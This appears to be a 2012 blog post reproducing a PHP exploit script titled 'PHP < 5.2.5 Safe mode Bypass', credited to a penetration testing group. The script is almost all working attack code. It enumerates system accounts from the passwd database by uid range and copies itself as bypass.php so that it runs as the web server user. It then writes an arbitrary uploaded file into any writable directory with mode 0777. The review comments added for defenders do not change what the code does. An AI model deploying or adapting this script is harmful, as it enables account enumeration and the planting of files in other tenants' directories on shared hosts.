Thursday, May 10, 2012


<?php 
########################## WwW.BugReport.ir ########################################### 
# 
#      AmnPardaz Security Research & Penetration Testing Group 
# 
# Title: PHP < 5.2.5 Safe mode Bypass 
# Vendor: http://www.php.net/ 
##################################################  ################################ 
?> 

<html dir="ltr"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<title>SAFE MODE BYPASS</title> 
<style type="text/css" media="screen"> 
body { 
    font-size: 10px; 
    font-family: verdana; 
} 
INPUT { 
    BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 
} 
</style> 
</head> 
<body dir="ltr" alink="#00ff00"  bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000"> 
<form method="POST" enctype="multipart/form-data" action="?"> 
Enter The <A href='?info=1' > Target Path </A>:<BR><BR> 
<input type="text" name="target" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR> 
File Content:<BR><BR> 
<input type="file" name="F1" size="50"><BR><BR> 
<input type="submit" name="Upload" value="Upload"> 
</form> 
<?php 
# Report everything except notices. Later code reads variables that may never
# have been assigned, and under this mask those reads produce no output.
error_reporting(E_ALL ^ E_NOTICE); 

# Account listing view, reached with info=1 in the query string.
# With POST fields `f` and `l` it prints the passwd record of every uid in
# [f, l); without them it prints a small form asking for the range. Either way
# the request ends at the die() calls below, so the upload handler never runs.
# Review notes: the range width is not capped, and the record fields are
# echoed without HTML escaping. The script's own error text indicates the view
# is unavailable when the posix functions are disabled on the host.
if(isset($_GET['info']) && $_GET['info'] == 1) 
{ 
    # function_exists() gates the whole view on posix_getpwuid being callable.
    if (function_exists('posix_getpwuid')) 
    { 
        if (isset($_POST['f']) && isset($_POST['l'])) 
        { 
            # intval() forces both bounds to integers; nothing limits l - f.
            $f = intval($_POST['f']); 
            $l = intval($_POST['l']); 
            while ($f < $l) 
            { 
                # A uid with no passwd entry yields a falsy result and is skipped.
                $uid = posix_getpwuid($f); 
                if ($uid) 
                { 
                    # The home directory is wrapped in an anchor whose href is
                    # empty, then all fields are printed colon-separated.
                    $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; 
                    echo join(":",$uid)."<br>"; 
                } 
                $f++; 
            } 
        } else 
        { 
            # No range posted yet: emit the range form (defaults 1 to 1000).
            echo ' 
            <form method="POST" action="?info=1">Uid   
            FROM : <input type="text" name="f" value="1" size="4"> 
            TO : <input type="text" name="l" value="1000" size="4"> 
            <input type="submit" name="Show" value="Show">'; 
        } 
    } else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!"); 
    # Stop here so nothing below this view executes for info requests.
    die(); 
} 

# Upload handler, run when the form posts `Upload` and a non-empty `target`.
# Flow, as written below:
#   1. Compare the owner uid of this script file with the uid of the web
#      server process.
#   2. If they differ, copy this file to bypass.php in the current directory
#      and stop, asking the user to run that copy instead.
#   3. Otherwise create a placeholder file inside the posted target directory,
#      move the uploaded file (field F1) over it, and set its mode to 0777.
# Review notes for defenders:
#   - `target` is used as posted (trimmed only); no allow-list or base-path
#     check is applied before files are created in it.
#   - Artefacts this code leaves on disk: a file named bypass.php next to the
#     script, and files whose names start with "BP" in the target directory
#     with mode 0777.
#   - The banner on this page scopes the issue to PHP < 5.2.5. safe_mode was
#     removed in PHP 5.4.0, so tenant separation on shared hosts has to come
#     from OS-level per-user isolation and non-writable directories rather
#     than from that setting.
#   - NOTE(review): the page does not say which internal check is skipped;
#     presumably the file-creation call used in step 3 — confirm against the
#     PHP 5.2.5 changelog.
if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "") 
{ 
    # getmyuid() is the owner of the script file, not the running process.
    # $MyUname is assigned here but never read in the visible code.
    $MyUid   = getmyuid(); 
    $MyUname = get_current_user(); 
    if (function_exists('posix_geteuid')) 
    { 
        # Effective uid of the running process and its passwd name, the
        # latter kept only for the message printed further down.
        $HttpdUid   = posix_geteuid(); 
        $HttpdInfo  = posix_getpwuid($HttpdUid); 
        $HttpdUname = "(".$HttpdInfo['name'].")"; 
    } else 
    { 
        # No posix functions: open bypass.php for writing and read the file's
        # owner back as the process uid. Mode 'w+' truncates an existing file.
        # $HttpdUname stays unset on this path. '@' hides the fopen warning.
        $NewScript = @fopen('bypass.php','w+'); 
        if (!$NewScript) 
        { 
            die('Make the Current directory Writeable (Chmod 777) and try again'); 
        } else  $HttpdUid = fileowner('bypass.php'); 
    } 

    # Loose comparison of the two uids; a mismatch triggers the self-copy.
    if ($MyUid != $HttpdUid) 
    { 
        echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!"; 
        echo " We Will create a copy of this Script with httpd User $HttpdUname 
        in current directory..."."<BR>"; 
        # On the posix path $NewScript was never assigned; the E_NOTICE mask
        # set at the top of the script keeps this read quiet.
        if (!$NewScript) 
        { 
            $NewScript = @fopen('bypass.php','w+'); 
            if (!$NewScript) 
            { 
                die('Make the Current directory Writeable (Chmod 777) and try again'); 
            } 
        } 
        # Copy this file line by line into bypass.php, so the copy is a file
        # written by the web server process.
        $Temp = fopen(__FILE__ ,'r'); 
        while (!feof($Temp)) 
        { 
            $Buffer = fgets($Temp); 
            fwrite($NewScript,$Buffer); 
        } 
        fclose($Temp); 
        fclose($NewScript); 
        echo "Please Run <A href='bypass.php'> This </A> Script"; 
        die();     
    } 
     
    # Create a uniquely named placeholder with prefix "BP" in the target.
    $TargetPath = trim($_POST['target']); 
    $TargetFile = tempnam($TargetPath,"BP"); 
    # tempnam() can fall back to the system temp directory when the requested
    # one is unusable; this check presumably guards against that by requiring
    # the returned path to contain the requested directory. The comparison is
    # loose, and both paths are echoed without escaping.
    if (strstr($TargetFile, $TargetPath) == TRUE) 
    { 
        echo $TargetFile." Successfully created!<BR>"; 
    } else die("$TargetPath doesnt exist or is not writeable! choose another path!"); 

    # Replace the placeholder with the uploaded file from form field F1.
    if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile)) 
    { 
        echo "<BR>$TargetFile is valid, and was successfully uploaded."; 
    } else 
    { 
        die("<BR>$TargetFile Could not upload."); 
    } 
    # World read/write/execute on the result; the return value is not checked.
    chmod($TargetFile , 0777); 
} 

?>
